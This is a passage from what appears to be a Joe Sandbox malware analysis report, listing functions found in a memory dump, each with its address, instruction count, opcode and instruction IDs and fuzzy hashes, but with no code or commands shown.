                                          Function 00007FFCA43F01A8 Relevance: .1, Instructions: 79COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 459e4ce5f511e267f8b1efff7eb953b95cce95c5c733b6b935c1d15042d6f4f7
                                          • Instruction ID: a15631a394c5e1ae62e220e05a77b79d060461e840d5b1aa00e8999e29cdd08c
                                          • Opcode Fuzzy Hash: 459e4ce5f511e267f8b1efff7eb953b95cce95c5c733b6b935c1d15042d6f4f7
                                          • Instruction Fuzzy Hash: BC212C30A19A1DCFDB54EF58C854AEA73F2FB99311F100679E40DDB294CB35A951CB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFCA43F367F Relevance: .1, Instructions: 77COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d5b8cdee61e09ee7c2bb132e94cbffeb7ff569dcd094d132813809ed42390357
                                          • Instruction ID: b6ca17a5cc45b9793a5ea22bfb29adb3412885cafa50da865b595ac1676e5e89
                                          • Opcode Fuzzy Hash: d5b8cdee61e09ee7c2bb132e94cbffeb7ff569dcd094d132813809ed42390357
                                          • Instruction Fuzzy Hash: 7821BD3184E7C98FDB47DB6488352E97FB0AF46210F0941EBC088DB1A3DA6D5809C762
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFCA43F3A44 Relevance: .1, Instructions: 77COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a4cff40b1b8c0275888c794b867af09e7ee63aa941e4fdad52bb6ccc05f17e0e
                                          • Instruction ID: f613e0cc4868c752c59a5ce96adb8a45eddbd69c3c37c0e77d063753b427b8b1
                                          • Opcode Fuzzy Hash: a4cff40b1b8c0275888c794b867af09e7ee63aa941e4fdad52bb6ccc05f17e0e
                                          • Instruction Fuzzy Hash: 64218B30909B998FDB16DF6888646D93BF1EB9A300F0501AAD448DB2A2CA34A954CB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFCA43FA058 Relevance: .1, Instructions: 71COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 78eaf2a68d4d39e391be2a53e7b6f19f03ada69aaa59a37e4e1f880198f823c6
                                          • Instruction ID: 695cf132f14c4170eb9128905d170735dfd647db9d54655e3cbc925020cd79a1
                                          • Opcode Fuzzy Hash: 78eaf2a68d4d39e391be2a53e7b6f19f03ada69aaa59a37e4e1f880198f823c6
                                          • Instruction Fuzzy Hash: 98219D7180D7CA8FDB429F6488652E57FB0FF2B204F0941DBD488CB1A3D6689549C752
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFCA43F0218 Relevance: .1, Instructions: 71COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0f9e02098f8b630a0e5e8dd2a9db19a1021eaf940785710aa1ecac0503cc1ee1
                                          • Instruction ID: 932990501d2c120841142d63c5fd041e8db7d32b860b3d8784329ed8c8d74830
                                          • Opcode Fuzzy Hash: 0f9e02098f8b630a0e5e8dd2a9db19a1021eaf940785710aa1ecac0503cc1ee1
                                          • Instruction Fuzzy Hash: 0E216A31914A1D8FCB44EF59C4929FE77F0EB98340F00067AE809E7291CA34F851CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFCA43F8AA4 Relevance: .1, Instructions: 70COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 759e4072d0f92918a3188f46de8f40658bbe93fe3d28ede303d4381dfc4fc001
                                          • Instruction ID: 570ed9569fbb726c747b93ec6c558178d58fca5b647d5752b7bb43248a43fecc
                                          • Opcode Fuzzy Hash: 759e4072d0f92918a3188f46de8f40658bbe93fe3d28ede303d4381dfc4fc001
                                          • Instruction Fuzzy Hash: FC219CB0D1692D8FEFA4DB088894BADB7B1FF98300F1086A6C01DE7251DB746D858F55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFCA43F94ED Relevance: .1, Instructions: 59COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7948af9bb9ba8c70b548140c90f74d470b6de823e5ec1931cc7a54af6f8ddbe5
                                          • Instruction ID: e900cad8afaed5d794c69cbde40d1e2cc749aacbeca200c34a614198ebbe0f34
                                          • Opcode Fuzzy Hash: 7948af9bb9ba8c70b548140c90f74d470b6de823e5ec1931cc7a54af6f8ddbe5
                                          • Instruction Fuzzy Hash: 1421BF7091899D8FDF94DF58C494BACBBB1FF59300F1541A9D44EEB2A5CA31A981CF10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFCA43F3328 Relevance: .1, Instructions: 59COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4504fc095d839e83db736f8fdf7a4b2f1cdb379ef8cfe613c60c33b3e49f193a
                                          • Instruction ID: a9ea806f626ff69001d22a26225ca3dc23d00cc9bad10ae43cd005c0c5518823
                                          • Opcode Fuzzy Hash: 4504fc095d839e83db736f8fdf7a4b2f1cdb379ef8cfe613c60c33b3e49f193a
                                          • Instruction Fuzzy Hash: 3E11823044E7C98FD746DF2488610D93FB0EF4B205B0905EBE888CB1A3C629A91AC791
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFCA43F2646 Relevance: .1, Instructions: 59COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 97711d43959c5826771338493f20b47c3264c2851a6ad664d8e236b5e4bdd55c
                                          • Instruction ID: 5fc52294b3560e6129617dea1048e31426c1f1828a1be5a8559fb85f29cf1bfa
                                          • Opcode Fuzzy Hash: 97711d43959c5826771338493f20b47c3264c2851a6ad664d8e236b5e4bdd55c
                                          • Instruction Fuzzy Hash: 9C11D630A1492D8FDF98EB5CC855BEDB7B2FBA8301F1041A9914DE3265CB35A981CF41
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFCA43F12E7 Relevance: .1, Instructions: 53COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6b7fd1cdd0165fe50045c7a56723024a7a77e7604251ad1cf36f28e6ae94e73c
                                          • Instruction ID: f476be679b443257348b7e3477acc1392b9d06315c5b3fcb6332e564d871e878
                                          • Opcode Fuzzy Hash: 6b7fd1cdd0165fe50045c7a56723024a7a77e7604251ad1cf36f28e6ae94e73c
                                          • Instruction Fuzzy Hash: 0311E771E09AAE8FEB52D7349C692A97BB0FF85300F5001FAC049DB292CE356941CB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFCA43F05A3 Relevance: .0, Instructions: 50COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9c7320f20dd8590155a4a19e341919b1621abbe34d5a0f944bfd2592dd53f71b
                                          • Instruction ID: 4c761d0bb0b056ffa8fd23c1ec4f6feeded92471002a1a115db9b3d226c0422f
                                          • Opcode Fuzzy Hash: 9c7320f20dd8590155a4a19e341919b1621abbe34d5a0f944bfd2592dd53f71b
                                          • Instruction Fuzzy Hash: EE11B670E19A2D8FDBA5EB5888A56E8B7B1EF58301F1041EAD00DE7265DB34A9818F10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFCA43F0478 Relevance: .0, Instructions: 48COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3ab2405cdd0f1208f6e3ee3c084e5439ed89714c667263cc41a33754147dfc8a
                                          • Instruction ID: 1dd905c9075d017b3cdeb43e5b1c458b630ad8dc9d95c8c11cebafdcea744808
                                          • Opcode Fuzzy Hash: 3ab2405cdd0f1208f6e3ee3c084e5439ed89714c667263cc41a33754147dfc8a
                                          • Instruction Fuzzy Hash: F811CE34E4A61E8BEB64DF64E490AEE73B1FB88310F000679E919A7291DF747A44CB11
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFCA43F329B Relevance: .0, Instructions: 47COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1b4ef05cdf272dfff5afd2221481118ad8c507e45f7be4d3f6570b2d4ba438ad
                                          • Instruction ID: 1d5bc07134de23517171c342d81a5df72ecafedd6ae6be1095ea12e0f0961a7f
                                          • Opcode Fuzzy Hash: 1b4ef05cdf272dfff5afd2221481118ad8c507e45f7be4d3f6570b2d4ba438ad
                                          • Instruction Fuzzy Hash: 91115E71E0491E8FDF44CF98D4909AEB7B1FF98310F10422AD419E7250CB34A9068B80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFCA43F02C8 Relevance: .0, Instructions: 46COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: aafadef0ecfcd6a702c31cde43f3e95b7b9fb2e92d1a931ff2eb0679d035db4e
                                          • Instruction ID: 7adf56d5278c0bbaf886d1e5d7459e325e9f4dc043cd43e2856b1defa457eb0e
                                          • Opcode Fuzzy Hash: aafadef0ecfcd6a702c31cde43f3e95b7b9fb2e92d1a931ff2eb0679d035db4e
                                          • Instruction Fuzzy Hash: 2101AD71A0991D8BDF88EA58D8242FAB7A1FB88310F0406BAE009F3295CF65681487A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFCA43FA0FD Relevance: .0, Instructions: 42COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cf9ae74cab8bd0bfc42bca42857a4585219ac1c879daf6ed2384fed8c7376917
                                          • Instruction ID: 478db8f3524e3b767f4cc15ccb1b5b2a100e392a7836d506e1e5a6efae868e9e
                                          • Opcode Fuzzy Hash: cf9ae74cab8bd0bfc42bca42857a4585219ac1c879daf6ed2384fed8c7376917
                                          • Instruction Fuzzy Hash: E7018B70809B4DCFDB84EF2888592EE7BF0FF28301F4106AAE818C3261DB75A550CB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFCA43F3C65 Relevance: .0, Instructions: 40COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 61221ba2e8fe6b097b1a84bc75ab4d8c16e20a6873f67e0bcffce852e465b448
                                          • Instruction ID: d1bce37adb685dfb3f9342adb627bc59dce6ed95c3176a1b18e1f976934b5ed9
                                          • Opcode Fuzzy Hash: 61221ba2e8fe6b097b1a84bc75ab4d8c16e20a6873f67e0bcffce852e465b448
                                          • Instruction Fuzzy Hash: B7011A30915A1D8FCB9CEF94C8A19FDB3B1FF95301F10456EA01A9B695CB35A842CF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFCA43F55CE Relevance: .0, Instructions: 38COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e08feaee8cf9bee88286544fb315cc750e98fc87445e3ddea9ab0ad20c8576ba
                                          • Instruction ID: aaa1c324c11d4347339a4d9500aef9924f6593781ba2668167672a635457887d
                                          • Opcode Fuzzy Hash: e08feaee8cf9bee88286544fb315cc750e98fc87445e3ddea9ab0ad20c8576ba
                                          • Instruction Fuzzy Hash: E801A530A0A51D8FDF44EF98C8949ADB7F2FB98300F114569D41AEB2A5DB39A900CB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFCA43F215A Relevance: .0, Instructions: 36COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3c7c09e1e3d4bf31fd6875dbc98327366ee25f9edf9fb5de3f4fcb7d1e71132c
                                          • Instruction ID: ff71c2da9b5221fded1b4501437122bb83f585764787881ae2c5ad8499a0e8cb
                                          • Opcode Fuzzy Hash: 3c7c09e1e3d4bf31fd6875dbc98327366ee25f9edf9fb5de3f4fcb7d1e71132c
                                          • Instruction Fuzzy Hash: 0CF08671D0A96E8EE7A4D72C98A57F877F0EF55200F0085F6D41DE71A2DE352E848B14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFCA43F0368 Relevance: .0, Instructions: 35COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4b6335a87e174d56c1799df073318b3ada50852520e70697cef9c7cc13aa8b4c
                                          • Instruction ID: ee2e5daa9e7168a429b20121ebec46d36ab6031eb0345743e530925aa784bda8
                                          • Opcode Fuzzy Hash: 4b6335a87e174d56c1799df073318b3ada50852520e70697cef9c7cc13aa8b4c
                                          • Instruction Fuzzy Hash: 74F0F930914A5DCFDB80EF6898496EE77F0FF58305F400A6AE819D3260DB75A654CB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFCA43F2468 Relevance: .0, Instructions: 35COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 35304572327ef348c0450aaa3b09f8b9755a630820ad36be1d2ba858f58114e4
                                          • Instruction ID: e4d8f73938c03fb25c44d6b4a88acb37d4fe097cab54208e6e8e0abb27db6a9f
                                          • Opcode Fuzzy Hash: 35304572327ef348c0450aaa3b09f8b9755a630820ad36be1d2ba858f58114e4
                                          • Instruction Fuzzy Hash: C801FB74E05609CFDB48DF68C5959EDB7F2FB89310F20853AC41AAB2A5CA35A901CF54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFCA43F0360 Relevance: .0, Instructions: 34COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 597966ed8244f273e2ccbd45ac5efc84bf2d8283310a38cab77bccb932b17707
                                          • Instruction ID: f4148636159d1f0cbcc3ed6113e2182d0fb7757cf52368abf97d47c57fc5dbd2
                                          • Opcode Fuzzy Hash: 597966ed8244f273e2ccbd45ac5efc84bf2d8283310a38cab77bccb932b17707
                                          • Instruction Fuzzy Hash: AAF01730928A5E8FDB80EF68D8496EE77F0FF58304F000A66E81CD3260DB74A654CB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFCA43F0190 Relevance: .0, Instructions: 30COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 52140f364b1d2cf207bbc05b4c763e011baf83340096a1229533ecb5a83348e5
                                          • Instruction ID: bc679f258ca609bbf779a69f5514916de03043fe4202dca0e1af65e437bb9853
                                          • Opcode Fuzzy Hash: 52140f364b1d2cf207bbc05b4c763e011baf83340096a1229533ecb5a83348e5
                                          • Instruction Fuzzy Hash: E7F05E30955A4DCFDB44EF28D8856EA77A0FF88304F40057AF819C7290DB35B551CB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFCA43F8E6B Relevance: .0, Instructions: 30COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: efc8947d1ed121d01ba3d39f65b365de900048eaa171adb7ed8c9ed156504ff7
                                          • Instruction ID: 117ac817501831f98a8d415379a1775cebffb890a16f84910cf082f683fb55fc
                                          • Opcode Fuzzy Hash: efc8947d1ed121d01ba3d39f65b365de900048eaa171adb7ed8c9ed156504ff7
                                          • Instruction Fuzzy Hash: 17F01F74D5AA2D9EEBE5EB188895BECB6B1FB58300F5004E6D40CE7261DF35A9808F10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFCA43F441D Relevance: .0, Instructions: 25COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 729d3792202dcc5bfa461cc45c1e0efc6595076a2ef356e52a07ee9e94295425
                                          • Instruction ID: 936c49aa705d8c9c1d5927c4cf9e7f8bb92569d393757a47d3557b9ce4ee80f1
                                          • Opcode Fuzzy Hash: 729d3792202dcc5bfa461cc45c1e0efc6595076a2ef356e52a07ee9e94295425
                                          • Instruction Fuzzy Hash: D4F0543490955E8FCB48EF04C4949A9B321FF61300B5047A5D0199F169C730E451CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFCA43F108D Relevance: .0, Instructions: 20COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b81196af0450fadfa7d118cc8b1ee5e354a196138ac962570b512fef0542a253
                                          • Instruction ID: 8aef17337c6b8cbd487b8a08b56c8d6c8862326120e1de940c2b6c3d4a0b5c04
                                          • Opcode Fuzzy Hash: b81196af0450fadfa7d118cc8b1ee5e354a196138ac962570b512fef0542a253
                                          • Instruction Fuzzy Hash: D6D02B9290AADF4AE948E32804751F456A1EF96210F4406B6888DDA1C3ED082C908923
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFCA43F0961 Relevance: .0, Instructions: 20COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: db1bbf6054ae1ce8cfc8c7d4417888c64867fbb091d6333063fb8f56c62270a0
                                          • Instruction ID: bcaedc6a5d1071a5003142e4aa353df2ebde36638e6dbb15bb16926a630c90ed
                                          • Opcode Fuzzy Hash: db1bbf6054ae1ce8cfc8c7d4417888c64867fbb091d6333063fb8f56c62270a0
                                          • Instruction Fuzzy Hash: 25E04FB0D0692D9EEBE8CA1CD495AE8B770FB89701F1042AAC05EA6251DF349881CF00
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFCA43F106C Relevance: .0, Instructions: 18COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e2b76e3ac42b69cfda405ce8b6a068eb3d7449333547696b3b628e168ef613cc
                                          • Instruction ID: 63dd474508e1100ac24950123aa1c8e2e55e28ab1d8258af9d42e82ae5da3c0f
                                          • Opcode Fuzzy Hash: e2b76e3ac42b69cfda405ce8b6a068eb3d7449333547696b3b628e168ef613cc
                                          • Instruction Fuzzy Hash: 22D09592D0B9EB45ED54E32414F40F44391DFD1201F000A75C90DDD2D3DE0C7C408522
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFCA43F8A36 Relevance: .0, Instructions: 16COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b9ff1a0047d768e452289fced54c4e09b68af7c3fb8a72683e4e3fb9245b10fe
                                          • Instruction ID: b73f81daa74b2ffafeb593de6429c3e5f454fd62337fbb415862a0c9210a016d
                                          • Opcode Fuzzy Hash: b9ff1a0047d768e452289fced54c4e09b68af7c3fb8a72683e4e3fb9245b10fe
                                          • Instruction Fuzzy Hash: 3CE0EC70D0691E8FDF98DE9885947ADA3B1EF94300F204565C00CF7251CB346E828B12
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFCA43F4B76 Relevance: .0, Instructions: 12COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a9207f1f3b962b8be55b5ac2087812e4ca26b29660c80e013b4cff201496a6ac
                                          • Instruction ID: 20de30f3815137590e11d0f0f19db68625881de10d033d0ad12af19b9cbcb36e
                                          • Opcode Fuzzy Hash: a9207f1f3b962b8be55b5ac2087812e4ca26b29660c80e013b4cff201496a6ac
                                          • Instruction Fuzzy Hash: 0FD09E3092A6198FDB4CDF64C6B64BE7771BF59340B20047ED117AB6A1CF35A902CB29
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFCA43F924B Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fc0af425c2733dc27cbe2cf669f1189df6bef1bac68edffca32cc161de4fede8
                                          • Instruction ID: c77614c11f334093ac135164e4e1060fb6478d49fe0b80a9cd72ae53bbe8353f
